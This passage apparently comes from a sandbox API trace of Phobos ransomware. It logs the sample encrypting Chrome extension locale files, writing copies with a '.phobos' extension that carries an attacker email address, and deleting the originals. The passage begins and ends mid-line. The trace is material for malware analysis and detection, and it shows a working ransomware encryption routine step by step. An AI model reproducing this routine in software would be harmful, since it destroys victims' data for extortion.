pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.082] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.082] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.083] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.083] CloseHandle (hObject=0x17c) returned 1 [0161.083] CloseHandle (hObject=0x134) returned 1 [0161.083] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json")) returned 1 [0161.084] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.084] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=234) returned 1 [0161.084] CloseHandle (hObject=0x134) returned 1 [0161.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json")) returned 0x2020 [0161.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.084] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.084] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.085] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.085] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.085] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xea, lpOverlapped=0x0) returned 1 [0161.086] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0161.086] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0161.086] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.086] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.087] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.087] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.087] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.087] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.087] CloseHandle (hObject=0x134) returned 1 [0161.087] CloseHandle (hObject=0x17c) returned 1 [0161.087] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json")) returned 1 [0161.088] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.088] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=304) returned 1 [0161.088] CloseHandle (hObject=0x17c) returned 1 [0161.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json")) returned 0x2020 [0161.089] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.089] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.089] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.089] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.089] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.089] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x130, lpOverlapped=0x0) returned 1 [0161.090] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140, dwBufLen=0x140 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140) returned 1 [0161.090] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x140, lpOverlapped=0x0) returned 1 [0161.091] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.091] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.091] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.091] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.091] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.091] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.091] CloseHandle (hObject=0x17c) returned 1 [0161.091] CloseHandle (hObject=0x134) returned 1 [0161.091] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json")) returned 1 [0161.092] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.093] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=232) returned 1 [0161.093] CloseHandle (hObject=0x134) returned 1 [0161.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json")) returned 0x2020 [0161.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.093] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.093] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.093] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.093] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.094] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe8, lpOverlapped=0x0) returned 1 [0161.094] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0161.094] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0161.095] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.095] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.095] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.095] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.095] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.095] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.095] CloseHandle (hObject=0x134) returned 1 [0161.095] CloseHandle (hObject=0x17c) returned 1 [0161.095] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json")) returned 1 [0161.096] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.097] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=258) returned 1 [0161.097] CloseHandle (hObject=0x17c) returned 1 [0161.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json")) returned 0x2020 [0161.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.097] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.097] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.098] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.098] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.098] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x102, lpOverlapped=0x0) returned 1 [0161.098] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0161.098] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0161.099] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.099] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.099] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.099] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.099] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.099] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.099] CloseHandle (hObject=0x17c) returned 1 [0161.099] CloseHandle (hObject=0x134) returned 1 [0161.100] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json")) returned 1 [0161.100] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.101] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=249) returned 1 [0161.101] CloseHandle (hObject=0x134) returned 1 [0161.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 